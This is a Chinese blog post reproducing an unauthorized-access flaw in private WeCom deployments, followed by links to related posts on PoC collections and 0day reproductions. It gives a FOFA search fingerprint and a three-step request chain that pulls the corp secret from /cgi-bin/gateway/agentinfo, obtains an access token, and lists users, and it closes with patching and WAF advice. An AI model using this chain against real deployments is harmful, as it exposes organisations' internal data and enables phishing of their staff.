2023年HW企业微信0day漏洞复现

已于 2023-08-15 07:28:18 修改
阅读量1.5k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2023-08-13 00:42:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/apple_52661176/article/details/132255670
版权

1 漏洞简介

        企业微信xxx.com/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取,文件获取、使用企业微信轻应用对内力量发送钓鱼文件和链接等风险

2 fofa指纹

app="Tencent-企业微信"

3 复现过程

3.1 获取Secret、strcorpid

xxx.com/cgi-bin/gateway/agentinfo

3.2 获取token

xxx.com/cgi-bin/gettoken?corpid=strcorpid&corpsecret=Secret

 strcorpid、Secret 为3.1获取的值

3.3 带入token请求功能接口

举例:获取标签成员

xxx.com/cgi-bin/user/list?access_token=access_token

access_token为3.2获取的值

更多功能情况访问

获取成员ID列表 - 接口文档 - 企业微信开发者中心

4 修复意见

  1. 更新至最新版本
  2. 临时处理:在waf上添加 /cgi-bin.gateway/agentinfo 规则阻拦
gnolnaituil
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【愚公系列】202305月 网络安全高级班 035.HW护网行动攻防演练(0day漏洞防护)
时光隧道
05-13 9519
0day漏洞指的是一种尚未被发现或公开披露的安全漏洞。攻击者可以利用这些漏洞进入受影响的系统或应用程序,可能会导致数据泄露、系统崩溃、恶意软件安装等严重后果。因为这些漏洞一开始被发现时没有任何补丁或防护措施,因此被称为0day漏洞
2023HW护网100+个漏洞poc
最新发布
Yb528970805的博客
09-19 3254
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC。
2023企业微信0day漏洞复现以及处理意见
holyxp的博客
08-13 1万+
漏洞编号:无企业微信0day漏洞可以在/cgi-bin/gateway/agentinfo接口未授权情况下可直接获取企业微信secret等敏感信息,可导致企业微信全量数据被获取。漏洞危害①可导致企业微信全量数据被获取、文件获取,②存在使用企业微信轻应用对内发送钓鱼文件和链接等风险。
2023 HW 必修高危漏洞集合
holyxp的博客
07-21 3246
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为 HW 攻防演练期间红队的重要突破口;每 HW 期间爆发了大量的高危风险漏洞成为红队突破网络边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、甚至靶标失守而遗憾出局。HW 攻防演练在即,输出HW 必修高危漏洞手册,意在帮助企业HW 攻防演练的前期进行自我风险排查,降低因高危漏洞而“城池失守”的风险。
微信0day远程代码执行漏洞
chaojixiaojingang
08-05 622
1.漏洞简介 由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限。 2.影响版本 <=3.2.1.141(Windows系统) 3.漏洞EXP 4.漏洞复现 1)利用CS设置一个http或者https监听器 2)利用cs生成payload,语言选择c# 3)生成默认文件名称为payload.cs,内...
2023-0Day漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
17、畅捷通Plus_ajaxpro命令执行 18、用友NC/Cloud bsh_servlet_BshServlet命令执行 19、金蝶云星空CommonFileserver任意文件读取 20、用友NC/Cloud_Jsinvoke文件上传 21、用友GRP-U8_logs敏感信息泄露 ...
HW2020-0day总结1
08-03
HW2020-0day总结1】这篇文章主要涵盖了多个信息安全漏洞的总结,涉及到不同厂商的产品,包括SQL注入、绕过登录、命令执行、远程代码执行(RCE)以及任意文件读取等严重安全问题。以下是对每个漏洞的详细解释: 1. *...
2023-0Day漏洞检测Tools)HW-漏洞挖掘-src
08-23
为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测,编写了2023公开漏洞的检测工具 8月22日 漏洞检测Tools V1.0更新漏洞利用如下: 1、用友移动管理系统文件上传漏洞(YonyouMa UPload) 2、用友...
2023-0Day漏洞检测Tools)V1.4 HW-漏洞挖掘-src
08-23
为更好帮助师傅们日常安全巡检期间及攻防演练期间进行安全自查检测,编写了2023公开漏洞的检测工具 8月22日 漏洞检测Tools V1.0更新漏洞利用如下: 1、用友移动管理系统文件上传漏洞(YonyouMa UPload) 2、用友...
企业微信爆出漏洞,公司员工被迫摸鱼
wangyuxiang946的博客
08-13 1万+
昨晚加班好好的,突然接到公司通知,说企业微信不让用了。 那还了得,微信不让用,工作就没法干,这给我急得,当场收拾书包就准备走人了。
微信0DAY复现
nzyp_的博客
06-18 638
微信0day漏洞复现 之前做了一次复现,又过了一个多月发现步骤都忘了,所以还是记录下来,以供日后参考 影响版本: 微信版本:<=3.2.1.141 Chrome:<=89.0.4389.114 环境准备: 一台kali用于使用CS、一台靶机、一台VPS用于提供访问网站 漏洞原理: 该漏洞是基于谷歌浏览器内核中一个JavaScript引擎的远程代码执行漏洞。当用户使用谷歌Chrome浏览器或微软Edge浏览器加载PoC HTML及其相对应的JavaScript文件时,攻击者可以利用
微信 0day漏洞复现
热门推荐
星落的博客
04-19 1万+
目录 漏洞简介 影响版本 CS安装 漏洞复现 修复建议 漏洞简介 由于微信采用的是google内核,前些日子google爆出0day远程代码执行漏洞,但是需要关闭沙箱,而微信采用的是老版本google内核,默认关闭沙箱,因此只要微信用户点击恶意连接,可直接获取该PC电脑权限 影响版本 <=3.2.1.141(Windows系统) CS安装 下载地址链接:https://pan.baidu.com/s/19En7Pkz7HIeey82PUvEBwQ 提取码:fczw 在ka...
2021HW — Chrome 0day漏洞
战神/calmness的博客
04-13 977
2021HW — Chrome 0day漏洞 目录 简述 漏洞环境 过程 修复建议 参考 2021HW — Chrome 0day漏洞 简述 北京时间4月13日凌晨,安全研究人员Rajvardhan Agarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。 为了测试该漏洞,研究者关闭了浏览器Edge89.0.774.76版本和Chrome89.0.4389.114版本的沙盒 分析ht...
企业微信cgi-bin/gateway/agentinfo接口存在未授权访问漏洞 附POC
nnn2188185的博客
08-30 903
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发企业微信是腾讯微信团队为企业打造的专业办公管理工具。与微信一致的沟通体验,丰富免费的OA应用,并与微信消息、小程序、微信支付等互通,助力企业高效办公和管理。
2023HW-8月(10-15)53个0day,1day漏洞汇总含POC、EXP
tangshuangsss的专栏
08-16 4633
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介2023HW-8月10-15号0day、1day漏洞汇总(已更新),包含以下漏洞需要自取。链接:https://pan.baidu.com/s/1Tr94yVFSHn_C6YiJcVprAw 提取码:6666通达OAsql注入漏洞 CVE-2023-4165 POC.. 2 通达OAsql注入漏洞 CVE-2023...
大华智慧园区综合管理平台SQL注入漏洞复现
0xSec
08-10 2355
大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
【TX 企业微信私有化历史版本 API 信息泄露】
qq_55213436的博客
08-13 1357
攻击者可以进行获取企业的部门信息,员工信息,如权限较高包括应用获取,记录文件等等均可查看。cgi-bin/gateway/agentinfo,可以直接未授权获取到id和secret。2. 限制 /cgi-bin/gateway/agentinfo 接口访问。3. 修改返回值信息,对文件加黑名单限制。利用:http://mydomain/toB toG版微信 2.5.x 版本。1. 联系企业微信官方获取补丁修复。2.6.930000 版本以下。
2022HW漏洞利用库:实战导向,非0day风险警示
"2022HW前沿漏洞利用库是一份专门针对IT安全领域的专业文档,它关注的是在2022可能出现的已知漏洞,而非0-day(零日漏洞)利用。这份文档旨在提高网络安全意识,提供给防御者和安全团队参考,而非用于未经授权的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值